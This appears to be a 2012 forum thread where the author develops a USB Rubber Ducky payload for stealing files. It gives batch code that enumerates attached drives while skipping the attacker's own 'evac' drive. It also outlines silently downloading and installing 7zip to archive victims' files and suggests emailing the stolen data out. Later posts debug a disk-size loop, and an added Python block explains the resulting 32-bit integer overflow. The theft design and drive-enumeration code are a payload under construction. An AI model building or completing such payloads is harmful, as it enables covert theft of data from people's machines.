overwraith
Posted November 4, 2012

I am starting work on a Ducky USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.

```
REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION
REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT
REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE
cmd.exe /V:ON

REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND
REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST
Set targetDr=*

REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION
REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE
REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED
REM EXPANSION WE SET EARLIER
for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a:
)

REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE
REM LIST VARIABLE EARLIER
Set targetDr=%targetDr:~1%

REM SHOW ME THE OUTPUT
echo %targetDr%
```

The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough. If the "stealthiness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.

overwraith (Author)
Posted November 5, 2012

Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?

```
cmd.exe /V:ON
Set /A usedSpace=0
for /R %i in (*) do Set /A usedSpace+=%~zi
```

Yields>

```
C:\>Set /A usedSpace+=8635
-1933490268
C:\>Set /A usedSpace+=5379
-1933484889
C:\>Set /A usedSpace+=22368
-1933462521
C:\>Set /A usedSpace+=2048
-1933460473
C:\>Set /A usedSpace+=844
-1933459629
C:\>Set /A usedSpace+=4726
-1933454903
C:\>Set /A usedSpace+=5182
-1933449721
C:\>Set /A usedSpace+=153298
-1933296423
C:\>Set /A usedSpace+=31
-1933296392
C:\>Set /A usedSpace+=1142784
-1932153608
C:\>Set /A usedSpace+=1630208
-1930523400
C:\>Set /A usedSpace+=540672
-1929982728
C:\>
```
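
The negative totals in the output above, as an added example that is not part of the original posts: `set /A` in cmd.exe works in signed 32-bit integers, so a running byte count that passes 2,147,483,647 wraps to a negative value. The Python below emulates that arithmetic on the logged lines; the function names and the sizes passed to `first_wrap` are constructed for illustration.

```python
INT32_MOD = 1 << 32  # a signed 32-bit counter repeats every 2**32

def to_int32(n):
    """Wrap an arbitrary integer into the signed 32-bit range."""
    n &= INT32_MOD - 1
    return n - INT32_MOD if n >= (1 << 31) else n

def set_a_add(total, delta):
    """One `set /A total+=delta` step in emulated 32-bit arithmetic."""
    return to_int32(total + delta)

# (addend, value echoed by cmd.exe) pairs copied from the output in the post.
LOGGED = [
    (8635, -1933490268), (5379, -1933484889), (22368, -1933462521),
    (2048, -1933460473), (844, -1933459629), (4726, -1933454903),
    (5182, -1933449721), (153298, -1933296423), (31, -1933296392),
    (1142784, -1932153608), (1630208, -1930523400), (540672, -1929982728),
]

def consistent_with_wrap(logged):
    """True if every echoed value is the previous one plus the addend, mod 2**32."""
    prev = to_int32(logged[0][1] - logged[0][0])
    for addend, shown in logged:
        if set_a_add(prev, addend) != shown:
            return False
        prev = shown
    return True

def smallest_true_total(shown):
    """Smallest non-negative real sum that a 32-bit counter displays as `shown`."""
    return shown % INT32_MOD

def first_wrap(sizes):
    """Index of the file at which the 32-bit sum first differs from the real sum."""
    true_total = shown = 0
    for i, size in enumerate(sizes):
        true_total += size
        shown = set_a_add(shown, size)
        if shown != true_total:
            return i
    return None

if __name__ == "__main__":
    print("log consistent with int32 wrap:", consistent_with_wrap(LOGGED))
    print("real total is at least", smallest_true_total(LOGGED[-1][1]), "bytes")
    print("constructed sizes wrap at index", first_wrap([2_000_000_000, 100_000_000, 100_000_000]))
```

The last echoed value corresponds to a real total of at least 2,364,984,568 bytes, so the counter had already passed the 32-bit limit before the lines shown in the post.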

overwraith (Author)
Posted December 6, 2012

This is going to need to be approached from another language instead of batch. Maybe VBS, Python, or PowerShell.